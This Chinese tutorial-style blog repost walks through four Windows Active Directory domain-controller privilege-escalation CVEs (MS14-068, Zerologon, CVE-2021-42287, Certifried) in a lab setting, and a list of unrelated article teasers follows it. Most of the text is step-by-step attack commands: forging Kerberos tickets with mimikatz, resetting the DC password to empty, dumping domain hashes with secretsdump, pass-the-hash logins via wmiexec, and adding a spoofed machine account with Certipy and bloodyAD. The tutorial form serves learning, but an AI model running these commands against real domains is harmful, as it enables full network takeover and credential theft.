权限提升-Win系统权限提升篇AD内网域控NetLogonADCSPACKDCCVE漏洞

news2024/11/16 10:25:43

知识点

1、WIN-域内用户到AD域控-CVE-2014-6324
2、WIN-域内用户到AD域控-CVE-2020-1472
3、WIN-域内用户到AD域控-CVE-2021-42287
4、WIN-域内用户到AD域控-CVE-2022-26923

章节点:
1、Web权限提升及转移
2、系统权限提升及转移
3、宿主权限提升及转移
4、域控权限提升及转移

Windows提权:
1、内核溢出漏洞提权
2、数据库类型提权
3、第三方软件应用提权

在这里插入图片描述

基础点

0、为什么我们要学习权限提升转移技术:

简单来说就是达到目的过程中需要用到它

1、具体有哪些权限需要我们了解掌握的:

后台权限
数据库权限
Web权限
计算机用户权限
计算机系统权限
宿主机权限
域控制器权限

2、以上常见权限获取方法简要归类说明:

后台权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成
数据库权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成
Web权限:RCE,反序列化,文件上传等直达或通过后台数据库间接造成
计算机用户权限:弱口令,数据泄漏等直达或通过Web,服务器及域控转移造成
计算机系统权限:系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成
宿主机权限:Docker不安全配置或漏洞权限提升直达(服务资产造成入口后提升)
域控制器权限:内网域计算机用户提升或自身内核漏洞,后门攻击,主机软件安全直达

3、以上常见权限获取后能操作的具体事情:

后台权限:文章管理,站点管理,模版管理,数据管理,上传管理等
数据库权限:操作数据库的权限,数据增删改查等(以数据库用户为主)
Web权限:源码查看,源码文件增删改查,磁盘文件文件夹查看(以权限配置为主)
计算机用户权限:就如同自己电脑上普通用户能操作的情况(敏感操作会被禁止)
计算机系统权限:就如同自己电脑上能操作的情况(整个系统都是你的)
宿主机权限:就如同自己电脑上能操作的情况(整个系统都是你的)
域控制器权限:就如同自己电脑上能操作的情况(整个内网域系统都是你的)

4、以上常见权限在实战中的应用场景介绍:

当我们通过弱口令进入到应用后台管理
当我们下载备份文件获取到数据库信息
当我们通过漏洞拿到资产系统的Web权限
当我们在公司被给予账号密码登录计算机或系统
当我们在公司或钓鱼后门获取到某个公司机器系统
.....................................

实战场景:

通过技术手段拿下内网域环境下某一台服务器权限或某主机上的域用户账号密码后,
与AD域控网络通讯正常的情况下,可直接使用域控提权CVE漏洞进行域控权限提升。

如何判断目标是否加入域环境?

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
或者

运行 net time /domain 该命令后,一般会有如下三种情况:
1.存在域,但当前用户不是域用户,提示说明权限不够
  C:\Windows>net time /domain
  发生系统错误 5 
  拒绝访问.

2.存在域,并且当前用户是域用户
  C:\Windows\Temp>net time /domain
  \\OWA2010SP3.0day.org 的当前时间是 2020/1/25 16:12:49
  令成功完成。

3.当前网络环境为工作组,不存在域
  C:\Users\Administrator>net time /domain
  找不到域 WORKGROUP 的域控制器。

在这里插入图片描述
在这里插入图片描述

一、演示案例-WIN-AD域控提权-CVE-2014-6324

项目地址

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/mimikatz
https://github.com/crupper/Forensics-Tool-Wiki/tree/master/windowsTools

前提条件:需要域用户账号密码

1、 获取域用户SID值

 whoami /user 

在这里插入图片描述

2、从域控获取时间,从而得到域控主机名

net time /domain

在这里插入图片描述

3、获取域控IP

ping 域控计算机名

在这里插入图片描述

4、获取当前域用户的一些信息

net config workstation

在这里插入图片描述

5、利用 ms14-068.exe 提权工具生成伪造的 kerberos 协议认证证书

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址
ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org

在这里插入图片描述

6、mimikatz导入伪造的 kerberos 协议认证证书

查看当前本地票据

kerberos::list

清理本地票据缓存

kerberos::purge

在这里插入图片描述

导入伪造的 kerberos 协议认证证书

kerberos::ptc "TGT_test02@test.lab.ccache"

在这里插入图片描述
在这里插入图片描述

7、尝试链接域控C盘

dir \\OWA2010CN-God.god.org\C$ 

在这里插入图片描述

8、使用psexec获取域控cmd权限

psexec \\OWA2010CN-God.god.org cmd

在这里插入图片描述

二、演示案例-WIN-AD域控提权-CVE-2020-1472

项目地址

POC:https://github.com/SecuraBV/CVE-2020-1472
EXP:https://github.com/dirkjanm/CVE-2020-1472
Impacket:https://github.com/fortra/impacket

CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,
影响Windows Server 2008R2至Windows Server 2019的多个版本系统,
只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.
该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows.

1、漏洞检测

python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21

在这里插入图片描述

2、重置域控为空密码

python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

在这里插入图片描述

3、连接后导出域控hash

python3 secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass

在这里插入图片描述
在这里插入图片描述

4、WMI连接域控

python3 wmiexec.py god/administrator@192.168.3.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

在这里插入图片描述

注:拿到域控权限后记得恢复域控hash,不然域内主机可能通信会出问题

参考地址:https://cloud.tencent.com/developer/article/2097955

三、演示案例-WIN-AD域控提权-CVE-2021-42287

项目地址

https://github.com/WazeHell/sam-the-admin

前提:只需要域内主机用户账号密码
python3 sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell

在这里插入图片描述
在这里插入图片描述

四、演示案例-WIN-AD域控提权-CVE-2022-26923

项目地址

https://github.com/ly4k/Certipy
https://github.com/CravateRouge/bloodyAD
https://github.com/SecureAuthCorp/impacket

前提条件:
1、一个域内普通账号
2、域内存在证书服务器
Kali添加访问域内信息 /etc/hosts
192.168.3.111 xiaodi.local
192.168.3.111 xiaodi-DC-CA
192.168.3.111 DC.xiaodi.local

域内信息
192.168.3.111
test Pass123  //普通域用户账号密码
xiaodi-DC-CA //ca名
DC.xiaodi.local  //域控名

0、获取CA结构名和计算机名

certutil -config - -ping

在这里插入图片描述

1、申请证书(Certipy工具)

certipy req 'xiaodi.local/test:Pass123@DC.xiaodi.local' -ca xiaodi-DC-CA -template User -debug

在这里插入图片描述

2、检测证书(Certipy工具)

certipy auth -pfx test.pfx

在这里插入图片描述

3、添加用户(bloodyAD工具)

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 addComputer pwnmachine 'CVEPassword1234*'

在这里插入图片描述

4、设置属性(bloodyAD工具)

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["DC.xiaodi.local"]'

在这里插入图片描述

5、申请证书(Certipy工具)

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.111' -template Machine -dc-ip 192.168.3.111 -ca xiaodi-DC-CA -debug

在这里插入图片描述

6、检测证书:(Certipy工具)

certipy auth -pfx ./dc.pfx -dc-ip 192.168.3.111

在这里插入图片描述

7、获取HASH(impacket工具)

python3 secretsdump.py 'xiaodi.local/dc$@DC.xiaodi.local' -hashes :b6046c1026699b59301ff66341838df4

在这里插入图片描述

8、利用HASH(impacket工具)

python3 wmiexec.py xiaodi.local/administrator@192.168.3.111 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1552266.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vulfocus环境搭建(kali搭建)

Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用。 安装docker环境 个人不建议随意更换apt源,我换了几次遇到很多问题。 apt-get update apt-get upgrade(时间很久) apt-get i…

C#手术麻醉系统源码 可对接HIS LIS PACS 医疗系统各类设备 医院手麻系统源码

C#手术麻醉系统源码 可对接HIS LIS PACS 医疗系统各类设备 手术麻醉信息管理系统主要还是为了手术室开发提供全面帮助的系统,其主要是由监护设备数据采集子系统和麻醉临床系统两个子部分组成。包括从手术申请到手术分配,再到术前访视、术中记录及术后…

融合创新!全局注意力+局部注意力,训练成本直降91.6%

全局注意力结合局部注意力可以让模型在处理数据时,既不会丢失重要的局部细节,也能考虑到整个数据集中的全局结构,从而在保持模型计算效率的同时,提高模型的表达能力。 这种策略相较于传统的单一注意力机制,能够更全面…

2024最新Win系统下VSCode下载安装与配置C/C++教程

2024最新Win系统下VSCode下载安装与配置C/C教程 文章目录 2024最新Win系统下VSCode下载安装与配置C/C教程1、下载安装VSCode2、安装运行时环境GCGC的环境配置 3、安装VSCode插件4、配置程序调试环境4.1确定文件存储路径4.2新建文件夹【.vscode】4.3在.vscode文件夹里新建四个配…

(二)BSQ,BIL,BIP存储格式的相互转换算法

环境:Windows10专业版 IDEA2021.2.3 jdk11.0.1 GDAL(release-1928-x64-gdal-3-5-2-mapserver-8-0-0) 系列文章: (一)PythonGDAL实现BSQ,BIP,BIL格式的相互转换 (二)BSQ,BIL,BIP存…

轻松赚钱,精彩生活:上班族副业赚钱新攻略大揭秘!

薪水总是捉襟见肘,每月账单总让人倍感压力。你是否曾在静谧的夜晚,躺在床上,思索如何为家庭多赚一分钱?其实,你并不孤单。在这个充满机遇与挑战的时代,越来越多的人开始寻找副业,以期望让生活更…

【LeetCode热题100】105. 从前序与中序遍历序列构造二叉树(二叉树)

一.题目要求 二叉树中的 路径 被定义为一条节点序列,序列中每对相邻节点之间都存在一条边。同一个节点在一条路径序列中 至多出现一次 。该路径 至少包含一个 节点,且不一定经过根节点。 路径和 是路径中各节点值的总和。 给你一个二叉树的根节点 root …

Java基础面试复习

一、java基础 1、jdk、jre、jvm的区别 jdk:Java程序开发工具包。 jre:Java程序运行环境。 jvm:Java虚拟机。 2、一个Java源文件中是否可以包含多个类有什么限制 解:可以包含多个类但是只有一个类生命成public并且要和文件名一致 …

1.java openCV4.x 入门-环境搭建

专栏简介 💒个人主页 📖心灵鸡汤📖大家 📰专栏目录 点击上方查看更多内容 环境搭建 一、开发环境二、环境搭建1.openCV安装1.下载程序包 2.程序包安装3.搭建项目 三、非必要资源1.扩展库2.cmake 一、开发环境 开发工具 i…

Python列表、元组、字典及集合

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 一、列表定义方式: 二、元组1、定义方式:2、元组中的物理存储地址不可修改,如果修改则会报错,但是元组中的列表、字典项等却可以…

Linux第84步_了解Linux中断及其函数

1、中断号 中断号又称中断线&#xff0c;每个中断都有一个中断号&#xff0c;通过中断号即可区分不同的中断。 2、Linux中断API函数 需要包含头文件“#include <linux/interrupt.h>” 1)、在使用某个中断功能的时候&#xff0c;需要执行“申请中断” int request_irq(…

VSCode 如何同步显示网页在手机或者平板上

首先要确保 ①电脑上安装了VsCode ②VsCode安装插件LiveServer 安装成功之后 连续按住 Alt L 、Alt O 会跳转到对应的html页面上 http://127.0.0.1:5500/....... 是这个开头的 然后打开网络 如果桌面有网上邻居的可以直接点桌面的网上邻居 进来找到WLAN这个…

2024年【道路运输企业安全生产管理人员】最新解析及道路运输企业安全生产管理人员证考试

题库来源&#xff1a;安全生产模拟考试一点通公众号小程序 道路运输企业安全生产管理人员最新解析参考答案及道路运输企业安全生产管理人员考试试题解析是安全生产模拟考试一点通题库老师及道路运输企业安全生产管理人员操作证已考过的学员汇总&#xff0c;相对有效帮助道路运…

InstanceID:zero-shot identity-preserving generation in sconds

1.introduction 个性化图像合成&#xff0c;挑战是生成能够准确保留人物的复杂身份细节的定制图像&#xff0c;这类任务通常称之为控ID型任务&#xff0c;在AI写真&#xff0c;虚拟试穿上都有应用&#xff0c;但是和虚拟试装还是有区别的&#xff0c;但技术路线上其实可以考虑复…

python多进程卡死问题排查

文章目录 背景开发环境启动链路 问题排查pdb调试给文件加共享锁查看进程fdstrace追踪堆栈<br />GDB调试python安装gdb和python-dbgpython-dbg和python版本编译python3.9的dbg文件gdb调试 pytorch多进程卡死问题多进程的fork和spawn模式 其他解决方式使用fastapi自带的bac…

康耐视visionpro-CogDataAnalyTool工具详细说明

CogDataAnalyTool功能: 数据分析工具,统计数据的平均值、标准差、最大值及最小值等。 CogDataAnalyTool操作说明: ①.打开工具栏,双击或点击鼠标拖拽添加CogDataAnalyTool ②.添加通道:根据需要添加多个输入通道,可同时统计多个输入数据。 ③.打开结果栏,点击运行可获…

Linux的学习之路:3、基础指令(2)

一、echo指令 这个指令在上篇文章我也用了但是忘了说了&#xff0c;这个指令的大概用法就是把后面跟的文本等输出在显示器上&#xff0c;如下代码所示打印的“Hello Linux” [rootVM-24-9-centos ~]# echo "Hello Linux" Hello Linux二、输出重定向与输入重定向 着…

金融案例:构建高效统一的需求登记与管理方案

在金融行业数字化转型背景下&#xff0c;银行等金融机构面临着业务模式创新与数据应用的深度融合。业务上所需要的不再是单纯的数据&#xff0c;而是数据背后映射的业务趋势洞察&#xff0c;只有和业务相结合转化为业务度量指标&#xff0c;经过数据分析处理呈现为报表进行展示…

MybatisPlus学习总结

MybatisPlus.xmind 一、MybatisPlus快速入门 1.基本介绍 官网: 简介 | MyBatis-Plus MyBatis Plus是一个基于MyBatis的增强工具&#xff0c;它简化了MyBatis的使用&#xff0c;提供了一系列的增强功能&#xff0c;使开发更加方便快捷。 MyBatis Plus的主要特点包括&#xff…

SQL,group by分组后分别计算组内不同值的数量

SQL&#xff0c;group by分组后分别计算组内不同值的数量 如现有一张购物表shopping 先要求小明和小红分别买了多少笔和多少橡皮&#xff0c;形成以下格式 SELECT name,COUNT(*) FROM shopping GROUP BY name;SELECT name AS 姓名,SUM( CASE WHEN cargo 笔 THEN 1 ELSE 0 END)…